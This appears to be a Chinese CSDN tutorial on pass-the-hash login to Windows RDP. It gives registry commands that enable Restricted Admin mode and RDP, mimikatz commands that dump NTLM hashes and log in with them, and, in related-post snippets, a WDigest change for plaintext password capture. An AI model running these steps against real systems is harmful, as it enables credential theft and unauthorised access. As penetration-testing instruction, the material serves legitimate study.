内网渗透:四、windowsRDP-hash传递登录

已于 2022-02-21 17:07:35 修改
阅读量4.6k 收藏 4
点赞数 1
文章标签: 哈希算法 p2p 算法
于 2022-02-21 17:03:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liu_jia_liang/article/details/123047119
版权

windows的RDP-hash登录利用

在渗透测试中,如果获得了某个用户的NTLM hash,我们可以尝试使用hash传递的方法对WMI和SMB服务进行登录,对于远程桌面服务同样可以进行利用。抓取hash无法破解的情况下,如果使用hash远程登录RDP,需要开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启。

  • 0x01:windows RDP-受限管理模式

Restricted Admin mode简介
官方说明:
Restricted Admin mode for RDP in Windows 8.1 / 2012 R2 | Microsoft Docs
Restricted Admin mode,直译为受限管理模式,主要功能是使得凭据不会暴露在目标系统中

  • 0x02、如何开启EDP服务indows RDP-受限管理模式:
  • 一、安装补丁:此种方法未曾用过,不过看其他师傅的blog说原理同修改注册表一样

参考链接:
https://support.microsoft.com/en-us/help/2973351/microsoft-security-advisory-registry-update-to-improve-credentials-pro

  • 二、修改注册表
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
新建DWORD键值DisableRestrictedAdmin,值为0,代表开启;值为1,代表关闭
对应命令行开启的命令如下:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
  • 0x03 开启3389端口

查看RDP端口

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber

得到连接端口为 0xd3d,转换后为 3389

windows server 2003

开启1:

REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭:

REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

开启2:

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

windows server 2008

开启:

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
  • 0x04、hash传递登录

客户端命令行:
mstsc.exe /restrictedadmin
如果当前系统不支持Restricted Admin mode,执行后弹出远程桌面的参数说明

如果当前系统支持Restricted Admin mode,执行后弹出远程桌面的登录界面

 

Restricted Admin mode使用当前Windows登录凭据,不需要输入口令,直接登录即可(Server开启Restricted Admin mode时,Client也需要支持Restricted Admin mode)

  • 0x05、实际操作

实验环境:

  • Windows server 2008 作为域控制器,域为 dc.com
  • Windows 10 作为 dc域下的一台设备

一、mimikatz

过去windows 10 的 NTLM hash:

mimikatz.exe
    privilege::debug
    sekurlsa::logonPasswords

获取当前用户zhangsan的 NTLM hash:    73292305e32730af1b5b94022b2b2aaa

 

执行命令:

privilege::debug
sekurlsa::pth /user:administrator /domain:remoteserver /ntlm:73292305e32730af1b5b94022b2b2aaa "/run:mstsc.exe /restrictedadmin"

 选择连接,成功实现远程登录(此处需注意两个坑)

        a、在进行远程连接时出现:远程计算机不支持受限管理模式或远程防护

 

        这总共有两种情况(计算机开启远程连接的情况):

                1:目标计算机不允许其他计算机远程协助该台计算机

                2、本地计算机注册表问题,具体参考上述开启方法

         b、服务端为win10或win7等个人pc操作系统时,通过NTLM hash登录后,无法进入桌面

提示由于安全策略被阻止

L_DC
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用Hash远程RDP登录
谢公子的博客
04-20 4286
我们知道在Windows Server2012及其以后的版本中,使用mimikatz在内存中抓取不到明文密码了,这是微软为了防止内存中泄露明文密码做的一个安全措施。 但是修改注册表后重启依然可以抓取到明文密码,执行如下命令,等待目标机器重启后使用mimikatz即可抓取到明文密码 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d
thmap:并发trie-hash映射库
01-28
thmap:并发trie-hash映射库
红队攻防之hash登录RDP
众生度尽,方证菩提
11-29 1293
没什么好害怕,孩子放心去飞吧,在你的身后有个等你的家
kali下利用FreeRDP进行hash登录远程桌面
crowsec
08-07 1435
在很多情况下,拿不到明文密码,由于对方机器是win2012的话,可以尝试使用hash登录RDP,看下桌面有什么东西。
利用哈希传递登录 RDP 远程桌面
网络安全。
01-15 848
Windows Server 2012 R2 采用了新版的 RDP 远程桌面协议,在这个新版协议中有一个 ”受限管理员” (Restricted Admin)的特性。相信渗透测试人员和系统管理员都会对这个特性有足够的兴趣,因为通过这个特性,我们可以实现哈希传递攻击并成功登录远程桌面。在抓取到的 Hash 无法破解的情况下,如果目标主机开启了 “Restricted Admin Mode” 也行,那么我们便可以使用 Hash 来直接实现 RDP 远程登录
WINDOWS传递管理员账号哈希值***
weixin_33755847的博客
12-10 206
在metasploit中只要有密码的哈希值就可以***操作系统了不需要明文密码,下面以实验为目的先用工具wce在操作系统上提取管理员密码的哈希值。下载wcehttp://1230tt.com/download/wce_v1_4beta_x32.zip在目标服务器上进入目录wce -l获取管理密码哈希值1AA818381E4E281BAAD3B435B51404EE:5F18A...
match-routes:基于http-hash的简单服务器端路由器
07-19
匹配路线 基于的简单服务器端路由器... hash: null, search: null, query: null, pathname: '/oh/awesome', path: '/oh/awesome', href: '/oh/awesome', parse: [Function], format: [Function], resolve: [Fu
Tabela-Hash:数据结构-哈希表
03-31
Tabela-Hash:数据结构-哈希表
Rabbit-Hash:Rabbit-Hash加密像兔子一样逐字节跳跃
03-29
兔子哈希 :rabbit: DES-based password hash algorithm The crypton is in progress made by mob and onion we are working to keep the code clean and doing what should be its purpose帮助 :carrot: Compile :: ...
ip-hash:ip-hash 平衡算法(基于循环)
06-01
ip-hash 基于的 ip-hash 平衡算法的实现。 安装 $ npm install ip-hash --save 用法 const iphash = require ( 'ip-hash' ) ; let servers = [ 'server-1' , 'server-2' , 'server-3' ] ; let assign = iphash...
使用Hash直接登录Windows
十年磨一剑,霜刃未曾试!
10-24 2633
首先,在本地主机(假设为目标主机)  新建一个wooyun用户,并为之设置密码,然后通过gethashes.exe获取到HASH  C:\>net user wooyun test  The command completed successfully.  C:\>gethashes.exe $local  1:1007:C2265B23734E0DACAAD3B435B
hash传递攻击谈相关Windows安全机制
weixin_33998125的博客
08-01 224
前言 path-the-hash,中文直译过来就是hash传递,在域中是一种比较常用的攻击方式。在网上所找到的资料,大多数是介绍如何实现此类攻击,但对于它背后所隐藏的关于Windows安全机制的一些知识,却鲜有探讨。本文的目的就是从pass-the-hash这一古老的话题切入,由攻击过程中Windows的行为引出它背后的安全机制,让大家对Windows有...
第15篇:内网横向中windows各端口远程登录哈希传递的方法总结
ABC_123的博客
06-09 3081
Part1 前言随着人们的安全意识的逐步加强,企业内部的Windows服务器口令越来越复杂了,经常会遇到提权到windows服务器,获取了用户的密码hash,但是cmd5官网或者本地猜解都拿不到明文密码的情况。这时候就需要用到内网哈希传递技术了。哈希传递利用了NTLM认证的缺陷,使用用户的密码哈希值来进行NTLM认证。如果目标机器与获取hash值的机器的密码相同,就可......
CDN,P2P,PCDN的区别?
ycwlkjyxgs的博客
05-11 653
怎么入坑,了解更多点击亿程智云官方网站http://yichengzhiyun.com.cn/会有相应的机顶盒品牌官方客服,获取更详细准确的指导。
Java 7大排序
m0_74270127的博客
05-10 812
插入排序、希尔排序、选择排序、堆排序、冒泡排序、快速排序、归并排序
算法】NOIP2003神经网络
最新发布
littlegengjie的博客
05-13 591
图中,X1—X3是信息输入渠道,Y1-Y2是信息输出渠道,C1表示神经元目前的状态,Ui是阈值,可视为神经元的一个内在参数。然后根据拓扑排序一次遍历该图的所有点(例如便利到点1,会遍历所有以点1位直接前驱的点),遍历点1之后,3、4、5的状态均为1,遍历点2之后3、4、5均为2,将所有输出点的状态减去阈值,就为最终状态。现在,给定一个神经网络,及当前输入层神经元的状态(Ci),要求你的程序运算出最后网络输出层的状态。再下面P行,每行由两个整数i,j及一个整数Wij,表示连接神经元i、j的边权值为Wij。
1080:余数相同问题
如果没有特别说明,c++都是基于GCC-4.9.2运行的
05-11 377
【代码】:1080:余数相同问题
找第二大的数(分治法)
2201_75525567的博客
05-11 301
这段代码通过递归的方式,将数组分为两半,并分别找出左半部分和右半部分的两个最大数,然后比较这个数的大小,得到第二大的数。这段代码是用来找出数组中第二大的数的。
::v-deep作用
01-06
::v-deep是Vue中的一个样式穿透选择器,它的作用是可以选择组件内部的标签,即使这些标签没有被添加data-v-hash属性。正常情况下,当给样式添加了scope后,只能选择当前页面标签或者组件的根标签。但是如果想要选择组件内的标签,就需要使用::v-deep选择器。 下面是一个示例代码演示::v-deep的作用: ```html <template> <div class="parent"> <child></child> </div> </template> <style scoped> .parent ::v-deep .child { color: red; } </style> ``` 在上面的代码中,我们在父组件的样式中使用了::v-deep选择器来选择子组件的class为child的标签,并将其颜色设置为红色。这样就可以穿透组件的样式作用域,直接选择子组件内的标签进行样式设置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值